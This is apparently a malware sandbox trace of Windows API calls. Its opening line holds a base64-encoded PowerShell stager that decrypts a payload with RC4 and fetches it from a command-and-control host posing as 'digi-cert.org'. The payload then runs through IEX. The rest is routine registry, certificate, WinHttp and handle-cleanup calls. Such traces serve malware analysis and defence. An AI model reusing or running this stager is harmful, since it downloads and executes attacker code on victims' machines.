AYwBIAEUAXQA6ADoARABFAGYAQQBVAGwAdABOAEUAVAB3AE8AcgBLAEMAcgBlAEQARQBuAFQAaQBBAGwAUwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBzAHQAZQBNAC4AVABFAFgAdAAuAEUAbgBjAE8AZABJAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAVABFAFMAKAAnAHQAbQBFAHcAcgBLAHAAdgBIADMAeAAuADYAKwBJAGEATwBZAGkALQAyAD8ATgA8AFoAdQBjAF4AVQBEAGQALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwBVAE4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAFgATwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHMAZQByAD0AJwBoAHQAdABwAHMAOgAvAC8AZABpAGcAaQAtAGMAZQByAHQALgBvAHIAZwA6ADQANAAzACcAOwAkAHQAPQAnAC8ATQBGAEUAdwBSAHoAQgBOAE0ARQBzAHcAUwBBAEEASgBCAGcAVQByAEMAZwBNAEMASABnAFUAQQBCAEIAUwBBAFUAUQBZAEIATQBxADIAYQB3AG4AMQBSAGgANgBEAG8AaAAnADsAJABXAEMALgBIAGUAYQBkAEUAUgBzAC4AQQBkAEQAKAAiAEEAYwBjAGUAcAB0ACIALAAiACoALwAqACIAKQA7ACQAdwBjAC4ASABlAGEAZABFAHIAUwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AbABIAFMAaAA2AG0ARABHAFoAOAByADMAMABWADkASABLAEcAUgBqAHEAMwBYAHcATgBTADgAPQAiACkAOwAkAGQAQQB0AGEAPQAkAFcAQwAuAEQATwBXAE4ATABPAEEARABEAGEAdABBACgAJABTAEUAcgArACQAVAApADsAJABJAHYAPQAkAGQAQQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAEQAYQB0AEEALgBMAGUATgBnAHQASABdADsALQBqAG8AaQBOAFsAQwBIAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==") returned 0x1390
	[0122.335] CoCreateGuid (in: pguid=0xd7edd8c810 | out: pguid=0xd7edd8c810*(Data1=0xd5f4274d, Data2=0xead8, Data3=0x47ed, Data4=([0]=0xb7, [1]=0x54, [2]=0xac, [3]=0x40, [4]=0xda, [5]=0x6, [6]=0xe1, [7]=0xc8))) returned 0x0
	[0122.336] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8c1b8 | out: phkResult=0xd7edd8c1b8*=0x670) returned 0x0
	[0122.336] RegQueryValueExW (in: hKey=0x670, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xd7edd8c13c, lpData=0x0, lpcbData=0xd7edd8c138*=0x0 | out: lpType=0xd7edd8c13c*=0x0, lpData=0x0, lpcbData=0xd7edd8c138*=0x0) returned 0x2

Thread:
	id = 188
	os_tid = 0x740


Thread:
	id = 189
	os_tid = 0xb84


Thread:
	id = 190
	os_tid = 0xbc8


Thread:
	id = 191
	os_tid = 0x47c


Thread:
	id = 192
	os_tid = 0xa7c

	[0411.019] DllCanUnloadNow () returned 0x1

Thread:
	id = 196
	os_tid = 0xb40


Thread:
	id = 197
	os_tid = 0xebc


Thread:
	id = 198
	os_tid = 0x888

	[0113.968] CoGetContextToken (in: pToken=0xd7ee3ff130 | out: pToken=0xd7ee3ff130) returned 0x0
	[0113.968] IUnknown:QueryInterface (in: This=0x2ad205dbe18, riid=0x7ffbf57cd270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ee3ff188 | out: ppvObject=0xd7ee3ff188*=0x2ad205dbe30) returned 0x0
	[0113.969] IComThreadingInfo:GetCurrentThreadType (in: This=0x2ad205dbe30, pThreadType=0xd7ee3ff220 | out: pThreadType=0xd7ee3ff220*=0) returned 0x0
	[0113.969] IUnknown:Release (This=0x2ad205dbe30) returned 0x1
	[0113.969] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0119.842] RegCloseKey (hKey=0x634) returned 0x0
	[0119.842] RegCloseKey (hKey=0x630) returned 0x0
	[0119.842] RegCloseKey (hKey=0x62c) returned 0x0
	[0120.960] RegCloseKey (hKey=0x678) returned 0x0
	[0120.960] RegCloseKey (hKey=0x6a4) returned 0x0
	[0120.961] RegCloseKey (hKey=0x68c) returned 0x0
	[0120.961] RegCloseKey (hKey=0x688) returned 0x0
	[0120.961] RegCloseKey (hKey=0x684) returned 0x0
	[0120.961] RegCloseKey (hKey=0x680) returned 0x0
	[0120.961] RegCloseKey (hKey=0x67c) returned 0x0
	[0120.961] RegCloseKey (hKey=0x660) returned 0x0
	[0120.962] RegCloseKey (hKey=0x6a0) returned 0x0
	[0120.962] RegCloseKey (hKey=0x674) returned 0x0
	[0120.962] RegCloseKey (hKey=0x670) returned 0x0
	[0120.962] RegCloseKey (hKey=0x66c) returned 0x0
	[0120.962] RegCloseKey (hKey=0x668) returned 0x0
	[0120.962] RegCloseKey (hKey=0x664) returned 0x0
	[0120.962] RegCloseKey (hKey=0x638) returned 0x0
	[0120.963] RegCloseKey (hKey=0x69c) returned 0x0
	[0120.963] RegCloseKey (hKey=0x698) returned 0x0
	[0120.963] RegCloseKey (hKey=0x65c) returned 0x0
	[0120.963] RegCloseKey (hKey=0x658) returned 0x0
	[0120.963] RegCloseKey (hKey=0x654) returned 0x0
	[0120.963] RegCloseKey (hKey=0x650) returned 0x0
	[0120.963] RegCloseKey (hKey=0x64c) returned 0x0
	[0120.964] RegCloseKey (hKey=0x648) returned 0x0
	[0120.964] RegCloseKey (hKey=0x630) returned 0x0
	[0120.964] RegCloseKey (hKey=0x640) returned 0x0
	[0120.964] RegCloseKey (hKey=0x694) returned 0x0
	[0122.250] RegCloseKey (hKey=0x650) returned 0x0
	[0124.637] CertFreeCertificateContext (pCertContext=0x2ad3babd6c0) returned 1
	[0124.638] CloseHandle (hObject=0x778) returned 1
	[0124.638] CloseHandle (hObject=0x774) returned 1
	[0124.638] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0124.638] CloseHandle (hObject=0x6d4) returned 1
	[0124.639] CloseHandle (hObject=0x6d0) returned 1
	[0124.639] CloseHandle (hObject=0x79c) returned 1
	[0124.639] CloseHandle (hObject=0x6cc) returned 1
	[0124.639] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0124.640] CertFreeCertificateContext (pCertContext=0x2ad3babd6c0) returned 1
	[0124.640] CloseHandle (hObject=0x7a0) returned 1
	[0124.640] CloseHandle (hObject=0x7a4) returned 1
	[0124.641] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0124.641] CloseHandle (hObject=0x788) returned 1
	[0124.641] CloseHandle (hObject=0x784) returned 1
	[0124.641] CloseHandle (hObject=0x6b4) returned 1
	[0124.641] CloseHandle (hObject=0x6b0) returned 1
	[0124.642] CloseHandle (hObject=0x6ac) returned 1
	[0124.642] CloseHandle (hObject=0x678) returned 1
	[0124.642] CloseHandle (hObject=0x780) returned 1
	[0124.642] CloseHandle (hObject=0x6a4) returned 1
	[0124.642] CloseHandle (hObject=0x688) returned 1
	[0124.643] CloseHandle (hObject=0x68c) returned 1
	[0124.643] CloseHandle (hObject=0x77c) returned 1
	[0124.643] CloseHandle (hObject=0x684) returned 1
	[0124.643] RegCloseKey (hKey=0x670) returned 0x0
	[0124.742] CloseHandle (hObject=0x64c) returned 1
	[0124.742] CloseHandle (hObject=0x648) returned 1
	[0124.742] CloseHandle (hObject=0x630) returned 1
	[0124.743] CloseHandle (hObject=0x640) returned 1
	[0124.743] CloseHandle (hObject=0x694) returned 1
	[0126.100] CoGetContextToken (in: pToken=0xd7ee3ff110 | out: pToken=0xd7ee3ff110) returned 0x0
	[0126.100] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0126.100] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0126.100] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0126.100] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0126.100] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0126.101] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0126.101] IUnknown:Release (This=0x2ad205dbe18) returned 0x1
	[0126.101] CryptDestroyKey (hKey=0x2ad3bafbf00) returned 1
	[0126.101] CryptReleaseContext (hProv=0x2ad3bb0ac10, dwFlags=0x0) returned 1
	[0126.101] CryptReleaseContext (hProv=0x2ad3bb0ac10, dwFlags=0x0) returned 1
	[0127.924] CoGetContextToken (in: pToken=0xd7ee3ff110 | out: pToken=0xd7ee3ff110) returned 0x0
	[0127.924] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0127.924] WbemLocator:IUnknown:Release (This=0x2ad3bb1e980) returned 0x0
	[0127.924] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0127.924] IUnknown:Release (This=0x2ad206a5000) returned 0x1
	[0127.924] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0127.924] IUnknown:Release (This=0x2ad206a72f0) returned 0x1
	[0127.924] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0127.924] IUnknown:Release (This=0x2ad206a52b0) returned 0x1
	[0127.924] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0127.924] IUnknown:Release (This=0x2ad206a7850) returned 0x1
	[0127.924] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0127.924] WbemLocator:IUnknown:Release (This=0x2ad3bb1f4c0) returned 0x0
	[0127.924] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0127.924] IUnknown:Release (This=0x2ad206a7b00) returned 0x1
	[0127.924] IUnknown:Release (This=0x2ad206a7b00) returned 0x0
	[0127.924] IUnknown:Release (This=0x2ad206a52b0) returned 0x0
	[0127.925] IUnknown:Release (This=0x2ad206a5000) returned 0x0
	[0127.925] CoGetContextToken (in: pToken=0xd7ee3fef40 | out: pToken=0xd7ee3fef40) returned 0x0
	[0127.925] IUnknown:Release (This=0x2ad3bb2b0a8) returned 0x1
	[0127.925] IUnknown:Release (This=0x2ad3bae1500) returned 0x0
	[0127.926] CoGetContextToken (in: pToken=0xd7ee3fef40 | out: pToken=0xd7ee3fef40) returned 0x0
	[0127.926] IUnknown:Release (This=0x2ad3babb9f8) returned 0x1
	[0127.926] IUnknown:Release (This=0x2ad206b9670) returned 0x0
	[0127.927] CryptReleaseContext (hProv=0x2ad3bb0c310, dwFlags=0x0) returned 1
	[0127.927] CloseHandle (hObject=0x9ac) returned 1
	[0127.927] LocalFree (hMem=0x2ad3bac3240) returned 0x0
	[0127.927] LocalFree (hMem=0x2ad3bac3020) returned 0x0
	[0127.927] CryptDestroyKey (hKey=0x2ad3bafc2f0) returned 1
	[0127.927] CryptReleaseContext (hProv=0x2ad3bb0c310, dwFlags=0x0) returned 1
	[0130.529] CoGetContextToken (in: pToken=0xd7ee3ff110 | out: pToken=0xd7ee3ff110) returned 0x0
	[0130.529] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.529] IUnknown:Release (This=0x2ad3bb11900) returned 0x1
	[0130.529] IUnknown:Release (This=0x2ad3bb11900) returned 0x0
	[0130.529] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.529] IUnknown:Release (This=0x2ad3bb12b00) returned 0x1
	[0130.529] IUnknown:Release (This=0x2ad3bb12b00) returned 0x0
	[0130.529] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.529] IUnknown:Release (This=0x2ad3bb116c0) returned 0x1
	[0130.529] IUnknown:Release (This=0x2ad3bb116c0) returned 0x0
	[0130.529] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.529] IUnknown:Release (This=0x2ad3bb2b3e8) returned 0x1
	[0130.529] IUnknown:Release (This=0x2ad22c91d40) returned 0x0
	[0130.531] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.531] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x1
	[0130.531] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x0
	[0130.531] IUnknown:Release (This=0x2ad206a72f0) returned 0x0
	[0130.531] IUnknown:Release (This=0x2ad206a7850) returned 0x0
	[0130.531] CryptDestroyKey (hKey=0x2ad3bafcc20) returned 1
	[0130.531] CryptReleaseContext (hProv=0x2ad3bb0ac10, dwFlags=0x0) returned 1
	[0130.531] CryptReleaseContext (hProv=0x2ad3bb0ac10, dwFlags=0x0) returned 1
	[0130.634] CoGetContextToken (in: pToken=0xd7ee3ff110 | out: pToken=0xd7ee3ff110) returned 0x0
	[0130.634] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.634] IUnknown:Release (This=0x2ad3bac3788) returned 0x1
	[0130.634] IUnknown:Release (This=0x2ad22d3bea0) returned 0x0
	[0130.635] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.635] IUnknown:Release (This=0x2ad3bb12980) returned 0x1
	[0130.635] IUnknown:Release (This=0x2ad3bb12980) returned 0x0
	[0130.635] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.635] IUnknown:Release (This=0x2ad3bb11600) returned 0x1
	[0130.635] IUnknown:Release (This=0x2ad3bb11600) returned 0x0
	[0130.635] CoGetContextToken (in: pToken=0xd7ee3ff030 | out: pToken=0xd7ee3ff030) returned 0x0
	[0130.635] IUnknown:Release (This=0x2ad3bb12440) returned 0x1
	[0130.635] IUnknown:Release (This=0x2ad3bb12440) returned 0x0
	[0130.635] CryptDestroyKey (hKey=0x2ad3bafd080) returned 1
	[0130.635] CryptReleaseContext (hProv=0x2ad3bb0d210, dwFlags=0x0) returned 1
	[0130.635] CryptReleaseContext (hProv=0x2ad3bb0d210, dwFlags=0x0) returned 1
	[0130.635] CryptDestroyKey (hKey=0x2ad3bafc910) returned 1
	[0130.635] CryptReleaseContext (hProv=0x2ad3bb0d210, dwFlags=0x0) returned 1
	[0130.635] CryptReleaseContext (hProv=0x2ad3bb0d210, dwFlags=0x0) returned 1
	[0130.770] CryptDestroyKey (hKey=0x2ad3bafc050) returned 1
	[0130.771] CryptReleaseContext (hProv=0x2ad3bb0c310, dwFlags=0x0) returned 1
	[0130.771] CryptReleaseContext (hProv=0x2ad3bb0c310, dwFlags=0x0) returned 1
	[0140.063] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0140.064] CertFreeCertificateContext (pCertContext=0x2ad3bb064d0) returned 1
	[0140.064] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0140.064] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0140.064] WinHttpCloseHandle (hInternet=0x2ad3bb18360) returned 1
	[0140.065] CloseHandle (hObject=0x9ec) returned 1
	[0140.065] CloseHandle (hObject=0x9e8) returned 1
	[0140.065] RegCloseKey (hKey=0x9e4) returned 0x0
	[0140.065] CloseHandle (hObject=0x9e0) returned 1
	[0140.065] RegCloseKey (hKey=0x9dc) returned 0x0
	[0140.065] CloseHandle (hObject=0x9d8) returned 1
	[0140.065] RegCloseKey (hKey=0x9d4) returned 0x0
	[0140.065] RegCloseKey (hKey=0x9d0) returned 0x0
	[0140.066] CertFreeCertificateContext (pCertContext=0x2ad3bb064d0) returned 1
	[0157.285] WinHttpCloseHandle (hInternet=0x2ad3bb187a0) returned 1
	[0157.286] CloseHandle (hObject=0x9e8) returned 1
	[0157.286] CloseHandle (hObject=0x9e4) returned 1
	[0157.286] RegCloseKey (hKey=0x9e0) returned 0x0
	[0157.286] CloseHandle (hObject=0x9dc) returned 1
	[0157.286] RegCloseKey (hKey=0x9d8) returned 0x0
	[0157.286] CloseHandle (hObject=0x9d4) returned 1
	[0157.287] RegCloseKey (hKey=0x9cc) returned 0x0
	[0157.287] RegCloseKey (hKey=0x9d0) returned 0x0
	[0157.287] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0157.287] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0157.287] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0157.288] CertFreeCertificateContext (pCertContext=0x2ad3bb06350) returned 1
	[0157.288] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3b60 | out: pvContextBuffer=0x2ad3bad3b60) returned 0x0
	[0157.288] CertFreeCertificateContext (pCertContext=0x2ad3bb06350) returned 1
	[0176.047] WinHttpCloseHandle (hInternet=0x2ad3bb1a9a0) returned 1
	[0176.048] CertFreeCertificateContext (pCertContext=0x2ad3bb04ad0) returned 1
	[0176.048] CloseHandle (hObject=0x9e8) returned 1
	[0176.048] CloseHandle (hObject=0x9e4) returned 1
	[0176.048] RegCloseKey (hKey=0x9e0) returned 0x0
	[0176.048] CloseHandle (hObject=0x9dc) returned 1
	[0176.048] RegCloseKey (hKey=0x9d8) returned 0x0
	[0176.048] CloseHandle (hObject=0x9d4) returned 1
	[0176.049] RegCloseKey (hKey=0x9cc) returned 0x0
	[0176.049] RegCloseKey (hKey=0x388) returned 0x0
	[0176.049] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0176.049] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0176.050] CertFreeCertificateContext (pCertContext=0x2ad3bb04ad0) returned 1
	[0176.050] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0176.051] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3440 | out: pvContextBuffer=0x2ad3bad3440) returned 0x0
	[0192.213] WinHttpCloseHandle (hInternet=0x2ad3bb1b440) returned 1
	[0192.213] CertFreeCertificateContext (pCertContext=0x2ad3bb06650) returned 1
	[0192.213] CloseHandle (hObject=0x9e8) returned 1
	[0192.214] CloseHandle (hObject=0x9e4) returned 1
	[0192.214] RegCloseKey (hKey=0x9e0) returned 0x0
	[0192.214] CloseHandle (hObject=0x9dc) returned 1
	[0192.214] RegCloseKey (hKey=0x9d8) returned 0x0
	[0192.214] CloseHandle (hObject=0x9d4) returned 1
	[0192.214] RegCloseKey (hKey=0x9cc) returned 0x0
	[0192.215] RegCloseKey (hKey=0x388) returned 0x0
	[0192.215] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0192.215] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0192.215] CertFreeCertificateContext (pCertContext=0x2ad3bb06650) returned 1
	[0192.216] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0192.216] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad30e0 | out: pvContextBuffer=0x2ad3bad30e0) returned 0x0
	[0214.161] WinHttpCloseHandle (hInternet=0x2ad3bb19680) returned 1
	[0214.161] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0214.161] CloseHandle (hObject=0x9e8) returned 1
	[0214.161] CloseHandle (hObject=0x9e4) returned 1
	[0214.161] RegCloseKey (hKey=0x9e0) returned 0x0
	[0214.161] CloseHandle (hObject=0x9dc) returned 1
	[0214.162] RegCloseKey (hKey=0x9d8) returned 0x0
	[0214.162] CloseHandle (hObject=0x9d4) returned 1
	[0214.162] RegCloseKey (hKey=0x9cc) returned 0x0
	[0214.162] RegCloseKey (hKey=0x388) returned 0x0
	[0214.163] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0214.163] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0214.163] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0214.164] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0214.164] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2fc0 | out: pvContextBuffer=0x2ad3bad2fc0) returned 0x0
	[0225.998] WinHttpCloseHandle (hInternet=0x2ad3bb1b660) returned 1
	[0225.998] CertFreeCertificateContext (pCertContext=0x2ad3bb06250) returned 1
	[0225.998] CloseHandle (hObject=0x9e4) returned 1
	[0225.998] CloseHandle (hObject=0x9e0) returned 1
	[0225.999] RegCloseKey (hKey=0x9dc) returned 0x0
	[0225.999] CloseHandle (hObject=0x9d8) returned 1
	[0225.999] RegCloseKey (hKey=0x9d4) returned 0x0
	[0225.999] CloseHandle (hObject=0x9cc) returned 1
	[0225.999] RegCloseKey (hKey=0x3f4) returned 0x0
	[0225.999] RegCloseKey (hKey=0x388) returned 0x0
	[0226.000] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0226.000] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0226.000] CertFreeCertificateContext (pCertContext=0x2ad3bb06250) returned 1
	[0226.000] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0226.000] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3620 | out: pvContextBuffer=0x2ad3bad3620) returned 0x0
	[0247.977] CertFreeCertificateContext (pCertContext=0x2ad3bb05cd0) returned 1
	[0247.977] WinHttpCloseHandle (hInternet=0x2ad3bb19240) returned 1
	[0247.978] CloseHandle (hObject=0x9e0) returned 1
	[0247.978] CloseHandle (hObject=0x9dc) returned 1
	[0247.978] RegCloseKey (hKey=0x9d8) returned 0x0
	[0247.978] CloseHandle (hObject=0x9d4) returned 1
	[0247.978] RegCloseKey (hKey=0x9cc) returned 0x0
	[0247.978] CloseHandle (hObject=0x3f4) returned 1
	[0247.978] RegCloseKey (hKey=0x398) returned 0x0
	[0247.978] RegCloseKey (hKey=0x388) returned 0x0
	[0247.979] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0247.979] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0247.979] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0247.979] CertFreeCertificateContext (pCertContext=0x2ad3bb05cd0) returned 1
	[0247.980] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2fc0 | out: pvContextBuffer=0x2ad3bad2fc0) returned 0x0
	[0254.972] WinHttpCloseHandle (hInternet=0x2ad3bb19ce0) returned 1
	[0254.972] CertFreeCertificateContext (pCertContext=0x2ad3bb05950) returned 1
	[0254.973] CloseHandle (hObject=0x9e0) returned 1
	[0254.973] CloseHandle (hObject=0x9dc) returned 1
	[0254.973] RegCloseKey (hKey=0x9d8) returned 0x0
	[0254.973] CloseHandle (hObject=0x9d4) returned 1
	[0254.973] RegCloseKey (hKey=0x9cc) returned 0x0
	[0254.973] CloseHandle (hObject=0x3f4) returned 1
	[0254.974] RegCloseKey (hKey=0x398) returned 0x0
	[0254.974] RegCloseKey (hKey=0x388) returned 0x0
	[0254.974] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0254.974] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0254.975] CertFreeCertificateContext (pCertContext=0x2ad3bb05950) returned 1
	[0254.975] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0254.975] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3080 | out: pvContextBuffer=0x2ad3bad3080) returned 0x0
	[0277.060] WinHttpCloseHandle (hInternet=0x2ad3bb1b220) returned 1
	[0277.060] CertFreeCertificateContext (pCertContext=0x2ad3bb04fd0) returned 1
	[0277.061] CloseHandle (hObject=0x9e0) returned 1
	[0277.061] CloseHandle (hObject=0x9dc) returned 1
	[0277.061] RegCloseKey (hKey=0x9d8) returned 0x0
	[0277.061] CloseHandle (hObject=0x9d4) returned 1
	[0277.061] RegCloseKey (hKey=0x9cc) returned 0x0
	[0277.061] CloseHandle (hObject=0x3f4) returned 1
	[0277.061] RegCloseKey (hKey=0x398) returned 0x0
	[0277.061] RegCloseKey (hKey=0x388) returned 0x0
	[0277.062] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0277.062] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0277.062] CertFreeCertificateContext (pCertContext=0x2ad3bb04fd0) returned 1
	[0277.063] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0277.063] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3b00 | out: pvContextBuffer=0x2ad3bad3b00) returned 0x0
	[0291.196] WinHttpCloseHandle (hInternet=0x2ad3bb19ac0) returned 1
	[0291.197] CertFreeCertificateContext (pCertContext=0x2ad3bb06050) returned 1
	[0291.197] CloseHandle (hObject=0x9e0) returned 1
	[0291.197] CloseHandle (hObject=0x9dc) returned 1
	[0291.197] RegCloseKey (hKey=0x9d8) returned 0x0
	[0291.198] CloseHandle (hObject=0x9d4) returned 1
	[0291.198] RegCloseKey (hKey=0x9cc) returned 0x0
	[0291.198] CloseHandle (hObject=0x3f4) returned 1
	[0291.198] RegCloseKey (hKey=0x398) returned 0x0
	[0291.198] RegCloseKey (hKey=0x388) returned 0x0
	[0291.199] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0291.199] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0291.199] CertFreeCertificateContext (pCertContext=0x2ad3bb06050) returned 1
	[0291.199] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0291.200] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3980 | out: pvContextBuffer=0x2ad3bad3980) returned 0x0
	[0310.339] WinHttpCloseHandle (hInternet=0x2ad3bb187a0) returned 1
	[0310.339] CertFreeCertificateContext (pCertContext=0x2ad3bb04ed0) returned 1
	[0310.339] CloseHandle (hObject=0x9cc) returned 1
	[0310.339] CloseHandle (hObject=0x3f4) returned 1
	[0310.339] RegCloseKey (hKey=0x398) returned 0x0
	[0310.340] CloseHandle (hObject=0x270) returned 1
	[0310.340] RegCloseKey (hKey=0x25c) returned 0x0
	[0310.340] CloseHandle (hObject=0xe4) returned 1
	[0310.340] RegCloseKey (hKey=0x9d0) returned 0x0
	[0310.340] RegCloseKey (hKey=0x388) returned 0x0
	[0310.341] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0310.341] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0310.341] CertFreeCertificateContext (pCertContext=0x2ad3bb04ed0) returned 1
	[0310.341] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0310.341] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad35c0 | out: pvContextBuffer=0x2ad3bad35c0) returned 0x0
	[0316.289] WinHttpCloseHandle (hInternet=0x2ad3bb1abc0) returned 1
	[0316.289] CertFreeCertificateContext (pCertContext=0x2ad3bb06350) returned 1
	[0316.289] CloseHandle (hObject=0x9cc) returned 1
	[0316.290] CloseHandle (hObject=0x3f4) returned 1
	[0316.290] RegCloseKey (hKey=0x398) returned 0x0
	[0316.290] CloseHandle (hObject=0x270) returned 1
	[0316.290] RegCloseKey (hKey=0x25c) returned 0x0
	[0316.290] CloseHandle (hObject=0xe4) returned 1
	[0316.290] RegCloseKey (hKey=0x9d0) returned 0x0
	[0316.291] RegCloseKey (hKey=0x388) returned 0x0
	[0316.291] CertFreeCertificateContext (pCertContext=0x2ad3bb065d0) returned 1
	[0316.291] CertFreeCertificateContext (pCertContext=0x2ad3bb05450) returned 1
	[0316.291] CertFreeCertificateContext (pCertContext=0x2ad3bb06350) returned 1
